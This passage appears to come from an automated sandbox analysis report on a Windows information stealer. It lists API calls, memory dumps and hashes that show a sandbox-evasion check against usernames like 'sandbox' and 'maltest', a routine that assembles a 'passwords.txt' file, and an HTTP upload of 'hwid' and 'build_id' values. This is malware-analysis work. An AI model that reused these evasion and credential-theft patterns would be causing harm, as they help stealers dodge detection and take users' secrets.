                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00088AA6
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00088AAD
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00088B95
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B71E8), ref: 00088BAB
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B71EC), ref: 00088BD3
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00088CF0
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00088D0B
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00088D4E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                                                                                                                    • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                                                                                                                                                    • API String ID: 3638656634-2709115261
                                                                                                                                                                                                                                                    • Opcode ID: ba83863826e30c77004345da95fcd57a5cf3e87212eb6a384ecb74ca95185e21
                                                                                                                                                                                                                                                    • Instruction ID: 6c7032f8038a07316835d2e466b4445bdc81c91ad3c26eaaa9cd2c683e3529fd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba83863826e30c77004345da95fcd57a5cf3e87212eb6a384ecb74ca95185e21
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6E10531D01119EFCF01BBA4EC4A9DE7BB5FF04304F514062FA95BB162DB21AE569B90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 000A4B1F
                                                                                                                                                                                                                                                    • __mtterm.LIBCMT ref: 000A4B2B
                                                                                                                                                                                                                                                      • Part of subcall function 000A47EA: DecodePointer.KERNEL32(FFFFFFFF), ref: 000A47FB
                                                                                                                                                                                                                                                      • Part of subcall function 000A47EA: TlsFree.KERNEL32(FFFFFFFF), ref: 000A4815
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000A4B41
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000A4B4E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000A4B5B
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000A4B68
                                                                                                                                                                                                                                                    • TlsAlloc.KERNEL32 ref: 000A4BB8
                                                                                                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000), ref: 000A4BD3
                                                                                                                                                                                                                                                    • __init_pointers.LIBCMT ref: 000A4BDD
                                                                                                                                                                                                                                                    • EncodePointer.KERNEL32 ref: 000A4BEE
                                                                                                                                                                                                                                                    • EncodePointer.KERNEL32 ref: 000A4BFB
                                                                                                                                                                                                                                                    • EncodePointer.KERNEL32 ref: 000A4C08
                                                                                                                                                                                                                                                    • EncodePointer.KERNEL32 ref: 000A4C15
                                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(Function_0002496E), ref: 000A4C36
                                                                                                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 000A4C4B
                                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000000), ref: 000A4C65
                                                                                                                                                                                                                                                    • __initptd.LIBCMT ref: 000A4C70
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 000A4C77
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                                                    • API String ID: 3732613303-3819984048
                                                                                                                                                                                                                                                    • Opcode ID: f6b19ce96b0fd1aeba0a7b6b4ea3f64a1581943b125f83a6ad515a82f285724e
                                                                                                                                                                                                                                                    • Instruction ID: 94f37fe005633766695ba02195e5a9f4e38202668ca6eb98522f83c1077d2b56
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6b19ce96b0fd1aeba0a7b6b4ea3f64a1581943b125f83a6ad515a82f285724e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 963182349563529AE7616FB9BD0468A3BE4EB86760F101627E914931B1DFFCD401CF60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 000885D3
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00088628
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0008862F
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 000886CB
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 000886E4
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 000886EE
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B719C), ref: 000886FA
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00088704
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B71A0), ref: 00088710
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 0008871D
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00088727
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B71A4), ref: 00088733
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00088740
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0008874A
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B71A8), ref: 00088756
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00088763
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0008876D
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B71AC), ref: 00088779
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B71B0), ref: 00088785
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 000887BE
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0008880B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTime
                                                                                                                                                                                                                                                    • String ID: passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 1139693110-347816968
                                                                                                                                                                                                                                                    • Opcode ID: eafca6d7817502cec113f0f5d6ba9be3e4a3708caf0f04f1e76827ac6c57caf1
                                                                                                                                                                                                                                                    • Instruction ID: 281e456f1cbc67109605e016ea36ce6327e25ed2b13f3a82826be6a33392dad4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eafca6d7817502cec113f0f5d6ba9be3e4a3708caf0f04f1e76827ac6c57caf1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C811532901108EFCF02BBA4FD4A9DD7BB5FF08311F514062FA51AB162EB31AE159B91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 00081A13
                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(000BABCC,?), ref: 00081A2E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: NameUserlstrcmpi
                                                                                                                                                                                                                                                    • String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
                                                                                                                                                                                                                                                    • API String ID: 542268695-1784693376
                                                                                                                                                                                                                                                    • Opcode ID: 04247ac8bff353e7b3aa8402aa2ad4cc5841d98b30d7eebc2f0a09ac6929a538
                                                                                                                                                                                                                                                    • Instruction ID: 888a86a95eb9f4e7e509630f3dfa024a8dd27ca4d55b95ade4b3a9c85f7ca591
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04247ac8bff353e7b3aa8402aa2ad4cc5841d98b30d7eebc2f0a09ac6929a538
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E221F5B0A0526C8BCB64DF15DD497D9BBF9BB4A308F0041D99058AA211CBB84EC9CF86
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AE8
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AEE
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AF4
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00084B06
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00084B0E
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00084BCD
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00084BEB
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00084D83
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00084DC7
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00084DF5
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,000B6953,",build_id,000B77C4,------,000B77B8,",hwid,000B77A4,------), ref: 000850EE
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00085101
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0008510F
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0008516C
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00085177
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 0008518E
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 0008519A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                                                                    • String ID: "$"$------$------$------$8w$build_id$hwid
                                                                                                                                                                                                                                                    • API String ID: 3006978581-911962417
                                                                                                                                                                                                                                                    • Opcode ID: 67f6366d172a262df49acf43d5de51ef9dc001d9fe11ef50bcd6aa9bf5932307
                                                                                                                                                                                                                                                    • Instruction ID: 548915c7f0c779cc4c87cc4864d41b92a9a01480e12e193b6a4110ef8f5254cf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67f6366d172a262df49acf43d5de51ef9dc001d9fe11ef50bcd6aa9bf5932307
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B025A31D5512A9BCF21AB20DC46ADDB7B4FF44300F4580E1A998B7162DB74BE8A9FD0
                                                                                                                                                                                                                                                    APIs
